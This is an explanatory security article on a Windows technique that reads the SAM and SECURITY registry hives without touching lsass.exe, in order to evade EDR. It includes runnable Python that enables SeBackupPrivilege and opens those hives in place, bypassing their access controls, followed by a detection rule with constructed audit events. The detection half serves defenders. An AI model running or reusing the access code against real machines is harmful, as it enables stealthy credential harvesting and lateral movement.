
How Hackers Stealthily Exfiltrate Windows Secrets and Credentials While Bypassing EDR Detection

A newly published method for silently exfiltrating Windows secrets and credentials evades most Endpoint Detection and Response (EDR) solutions. It lets an attacker who already has local administrator access on a Windows machine harvest credentials for lateral movement across the network without triggering the alerts those products rely on. The Local Security Authority (LSA), which runs inside the lsass.exe process, is the component that manages this sensitive material. It works from two in-memory databases, each backed by an on-disk registry hive: the SAM database (the HKLM\SAM hive), which holds the local accounts and their password hashes, and the Security database (the HKLM\SECURITY hive), which holds LSA secrets such as cached domain credentials and the machine account key. Both hives carry Discretionary Access Control Lists (DACLs) that grant read access only to SYSTEM, not to members of Administrators, and the data inside them is itself encrypted with keys derived from the SYSTEM hive, so retrieving it takes more than a single registry read.

According to the researcher Sud0Ru, the technique is two-pronged and rests on lesser-known Windows internals; the prong described here is access to the protected hives. It uses the native NtOpenKeyEx function, which takes an open-options argument that the documented RegOpenKeyEx API does not expose. When a key is opened with backup semantics (REG_OPTION_BACKUP_RESTORE) by a process that has SeBackupPrivilege enabled, the kernel grants read access without consulting the key's DACL. An elevated local administrator already holds that privilege, so no SYSTEM token is needed, and because the SAM and SECURITY keys are read in place, nothing is written to disk, unlike a `reg save` or RegSaveKey export, which leaves a hive file for scanners and file-creation telemetry to find. The approach never touches lsass.exe at all: no process handle, no memory read, so the activity EDRs most reliably alert on, direct interaction with lsass.exe memory, simply does not occur. For defenders the evidence moves to the token and the registry: catching this requires auditing privilege enablement and handle requests on the SAM and SECURITY keys rather than watching for lsass access or dropped hive files, and it is one more reason to limit where local administrator rights exist at all.
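The access step as an added, runnable illustration (this is not Sud0Ru's code or tooling, and it decrypts nothing): it shows the documented registry API being refused on HKLM\SAM and HKLM\SECURITY for an administrator, then the same hives opening in place through NtOpenKeyEx once SeBackupPrivilege is enabled. The option flag REG_OPTION_BACKUP_RESTORE, the use of RtlAdjustPrivilege to enable the privilege, and the two subkey paths are assumptions about the mechanism, not details the page gives. The Windows-only calls are kept inside functions so the module imports anywhere; `main()` needs an elevated prompt on Windows.

```python
"""Open HKLM\\SAM and HKLM\\SECURITY in place through NtOpenKeyEx.

Added example, not Sud0Ru's code. Assumed mechanism: the REG_OPTION_BACKUP_RESTORE
open option, which the kernel honours (KEY_READ granted, DACL skipped) only while the
caller has an enabled SeBackupPrivilege; an elevated local administrator holds it.
"""
import ctypes
import sys

REG_OPTION_BACKUP_RESTORE = 0x00000004   # open with backup/restore semantics
OBJ_CASE_INSENSITIVE = 0x00000040
KEY_READ = 0x00020019                     # backup semantics grant no more than this
SE_BACKUP_PRIVILEGE = 17                  # LUID low part, as RtlAdjustPrivilege expects
STATUS_SUCCESS = 0x00000000
WCHAR_SIZE = ctypes.sizeof(ctypes.c_wchar)


class UNICODE_STRING(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_uint16),
                ("MaximumLength", ctypes.c_uint16),
                ("Buffer", ctypes.c_wchar_p)]


class OBJECT_ATTRIBUTES(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_uint32),
                ("RootDirectory", ctypes.c_void_p),
                ("ObjectName", ctypes.POINTER(UNICODE_STRING)),
                ("Attributes", ctypes.c_uint32),
                ("SecurityDescriptor", ctypes.c_void_p),
                ("SecurityQualityOfService", ctypes.c_void_p)]


OBJECT_ATTRIBUTES_SIZE = ctypes.sizeof(OBJECT_ATTRIBUTES)


def nt_path(hklm_subkey):
    """Native object-manager path for an HKLM-relative key (what NtOpenKeyEx expects)."""
    return "\\Registry\\Machine\\" + hklm_subkey.strip("\\")


def build_object_attributes(path):
    """OBJECT_ATTRIBUTES naming `path`. Returns the struct plus the objects it points at;
    the caller keeps them alive for as long as the struct is in use."""
    buf = ctypes.create_unicode_buffer(path)            # NUL-terminated, len+1 chars
    us = UNICODE_STRING(len(path) * WCHAR_SIZE, ctypes.sizeof(buf),
                        ctypes.cast(buf, ctypes.c_wchar_p))
    oa = OBJECT_ATTRIBUTES(OBJECT_ATTRIBUTES_SIZE, None, ctypes.pointer(us),
                           OBJ_CASE_INSENSITIVE, None, None)
    return oa, us, buf


def _ntdll():
    ntdll = ctypes.WinDLL("ntdll")
    ntdll.RtlAdjustPrivilege.restype = ctypes.c_uint32
    ntdll.RtlAdjustPrivilege.argtypes = [ctypes.c_uint32, ctypes.c_ubyte, ctypes.c_ubyte,
                                         ctypes.POINTER(ctypes.c_ubyte)]
    ntdll.NtOpenKeyEx.restype = ctypes.c_uint32
    ntdll.NtOpenKeyEx.argtypes = [ctypes.POINTER(ctypes.c_void_p), ctypes.c_uint32,
                                  ctypes.POINTER(OBJECT_ATTRIBUTES), ctypes.c_uint32]
    return ntdll


def enable_backup_privilege():
    """Enable SeBackupPrivilege on the process token; fails on a non-elevated token."""
    was_enabled = ctypes.c_ubyte(0)
    status = _ntdll().RtlAdjustPrivilege(SE_BACKUP_PRIVILEGE, 1, 0, ctypes.byref(was_enabled))
    return status == STATUS_SUCCESS


def open_key_backup_semantics(hklm_subkey):
    """NtOpenKeyEx with REG_OPTION_BACKUP_RESTORE: with SeBackupPrivilege enabled the DACL
    is not consulted, so keys that grant Administrators nothing still open for read.
    Nothing is written to disk. Returns (ntstatus, handle)."""
    oa, _us, _buf = build_object_attributes(nt_path(hklm_subkey))
    handle = ctypes.c_void_p()
    status = _ntdll().NtOpenKeyEx(ctypes.byref(handle), KEY_READ, ctypes.byref(oa),
                                  REG_OPTION_BACKUP_RESTORE)
    return status, handle.value


def describe_key(handle):
    """Use the NT handle through the ordinary registry API: (subkey names, value count)."""
    import winreg
    n_sub, n_val, _ = winreg.QueryInfoKey(handle)
    return [winreg.EnumKey(handle, i) for i in range(n_sub)], n_val


def main():
    if sys.platform != "win32":
        sys.exit("Windows only")
    import winreg
    # Control: the documented API is subject to the DACL and is refused for an administrator.
    for key in ("SAM", "SECURITY"):
        try:
            winreg.CloseKey(winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key, 0, winreg.KEY_READ))
            print(f"RegOpenKeyEx HKLM\\{key}: opened (unexpected; running as SYSTEM?)")
        except PermissionError:
            print(f"RegOpenKeyEx HKLM\\{key}: access denied")
    if not enable_backup_privilege():
        sys.exit("SeBackupPrivilege unavailable: run from an elevated prompt")
    for key in ("SAM\\SAM\\Domains\\Account\\Users", "SECURITY\\Policy\\Secrets"):
        status, handle = open_key_backup_semantics(key)
        if status != STATUS_SUCCESS:
            print(f"NtOpenKeyEx HKLM\\{key}: NTSTATUS 0x{status:08X}")
            continue
        subkeys, n_val = describe_key(handle)
        print(f"NtOpenKeyEx HKLM\\{key}: opened in place, subkeys {subkeys}, {n_val} values")
        winreg.CloseKey(handle)


if __name__ == "__main__":
    main()
```

The control case matters for defenders as much as the bypass: the refused RegOpenKeyEx produces a failure audit on the key, while the NtOpenKeyEx open produces a success audit that records the privilege used, and those two events are what a detection has to key on, since no lsass handle and no hive file ever exist.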
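The detection side, as an added example that is not from the page or from Sud0Ru: a correlation over Windows Security-log events that an in-place SAM/SECURITY open leaves behind. The events below are constructed, in the flat field layout a SIEM produces from EVTX XML; the field names follow the audit schema for 4703 (a user right was adjusted) and 4656 (a handle to an object was requested). Assumptions to tune: the allow-list of legitimate backup processes, and that the 4656 PrivilegeList field records SeBackupPrivilege for backup-semantics opens. Prerequisites the code cannot supply: the "Audit Token Right Adjusted" and "Audit Registry" subcategories enabled, and a SACL on HKLM\SAM and HKLM\SECURITY.

```python
"""Flag SAM/SECURITY hives opened in place by way of SeBackupPrivilege.

Added detection example; the sample events are constructed, not real log data.
"""
from collections import defaultdict

PROTECTED_KEY_PREFIXES = (r"\REGISTRY\MACHINE\SAM", r"\REGISTRY\MACHINE\SECURITY")
# Processes expected to open these hives with backup semantics (assumed; tune per estate).
ALLOWED_PROCESSES = {r"c:\windows\system32\wbengine.exe"}


def is_protected_key(name):
    """True for the SAM/SECURITY hives and anything beneath them (not e.g. ...\\SAMPLE)."""
    n = name.upper()
    return any(n == p or n.startswith(p + "\\") for p in PROTECTED_KEY_PREFIXES)


def privileges(field):
    """PrivilegeList / EnabledPrivilegeList is newline- or tab-separated; '-' means none."""
    return {p.strip() for p in field.replace("\t", "\n").split("\n") if p.strip() not in ("", "-")}


def detect(events):
    """One alert per (pid, process) that obtained a handle to SAM/SECURITY keys using
    SeBackupPrivilege, plus one per process whose plain open of those keys was refused
    (the probe that usually precedes the bypass). 4703 only enriches the alert with the
    time the process enabled the privilege. ISO-8601 timestamps sort chronologically."""
    enabled_at, reads, denied = {}, defaultdict(list), defaultdict(list)
    for e in sorted(events, key=lambda ev: ev["time"]):
        proc = (e["ProcessId"], e["ProcessName"].lower())
        if e["EventID"] == 4703 and "SeBackupPrivilege" in privileges(e["EnabledPrivilegeList"]):
            enabled_at.setdefault(proc, e["time"])
        elif e["EventID"] == 4656 and e["ObjectType"] == "Key" and is_protected_key(e["ObjectName"]):
            if e["Keywords"] == "Audit Failure":
                denied[proc].append(e["ObjectName"])
            elif "SeBackupPrivilege" in privileges(e["PrivilegeList"]):
                reads[proc].append(e["ObjectName"])
    alerts = []
    for (pid, name), keys in reads.items():
        if name not in ALLOWED_PROCESSES:
            alerts.append({"kind": "in-place hive read via SeBackupPrivilege", "pid": pid,
                           "process": name, "keys": keys,
                           "privilege_enabled_at": enabled_at.get((pid, name))})
    for (pid, name), keys in denied.items():
        alerts.append({"kind": "denied SAM/SECURITY open (probe)", "pid": pid,
                       "process": name, "keys": keys})
    return alerts


def _ev(time, eid, pid, proc, **fields):
    return {"time": time, "EventID": eid, "ProcessId": pid, "ProcessName": proc, **fields}


SAMPLE_EVENTS = [  # constructed for this example
    # Windows Backup legitimately opening a hive with backup semantics (allow-listed)
    _ev("2024-05-01T09:00:00", 4703, "0x4d0", r"C:\Windows\System32\wbengine.exe",
        EnabledPrivilegeList="SeBackupPrivilege\n\t\tSeRestorePrivilege"),
    _ev("2024-05-01T09:00:03", 4656, "0x4d0", r"C:\Windows\System32\wbengine.exe",
        Keywords="Audit Success", ObjectType="Key",
        ObjectName=r"\REGISTRY\MACHINE\SECURITY", PrivilegeList="SeBackupPrivilege"),
    # an admin exporting a vendor key with backup semantics: not a protected hive
    _ev("2024-05-01T09:01:00", 4703, "0x1234", r"C:\Windows\regedit.exe",
        EnabledPrivilegeList="SeBackupPrivilege"),
    _ev("2024-05-01T09:01:02", 4656, "0x1234", r"C:\Windows\regedit.exe",
        Keywords="Audit Success", ObjectType="Key",
        ObjectName=r"\REGISTRY\MACHINE\SOFTWARE\Vendor", PrivilegeList="SeBackupPrivilege"),
    # in-place harvest: plain open refused, privilege enabled, SAM and SECURITY opened
    _ev("2024-05-01T09:01:58", 4656, "0x1f40", r"C:\Users\bob\Downloads\tool.exe",
        Keywords="Audit Failure", ObjectType="Key",
        ObjectName=r"\REGISTRY\MACHINE\SAM", PrivilegeList="-"),
    _ev("2024-05-01T09:02:00", 4703, "0x1f40", r"C:\Users\bob\Downloads\tool.exe",
        EnabledPrivilegeList="SeBackupPrivilege"),
    _ev("2024-05-01T09:02:01", 4656, "0x1f40", r"C:\Users\bob\Downloads\tool.exe",
        Keywords="Audit Success", ObjectType="Key",
        ObjectName=r"\REGISTRY\MACHINE\SAM\SAM\Domains\Account\Users", PrivilegeList="SeBackupPrivilege"),
    _ev("2024-05-01T09:02:01", 4656, "0x1f40", r"C:\Users\bob\Downloads\tool.exe",
        Keywords="Audit Success", ObjectType="Key",
        ObjectName=r"\REGISTRY\MACHINE\SECURITY\Policy\Secrets", PrivilegeList="SeBackupPrivilege"),
    # lsass reading SAM as SYSTEM needs no privilege: the DACL simply allows it
    _ev("2024-05-01T09:02:05", 4656, "0x2c4", r"C:\Windows\System32\lsass.exe",
        Keywords="Audit Success", ObjectType="Key",
        ObjectName=r"\REGISTRY\MACHINE\SAM\SAM\Domains", PrivilegeList="-"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Run against the sample, the rule raises two alerts, both for tool.exe: the in-place read of the two protected keys, enriched with the 09:02:00 privilege enablement, and the refused plain open that came just before it. wbengine.exe opens SECURITY the same way but is allow-listed; regedit.exe and lsass.exe never match because the key is not protected or no privilege was used.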

Categories: Credential Harvesting, Windows Security Architecture, Evasion Techniques 

Tags: Windows, Secrets, Credentials, LSA, lsass.exe, SAM Database, SECURITY Database, EDR, Exfiltration, Access Controls 
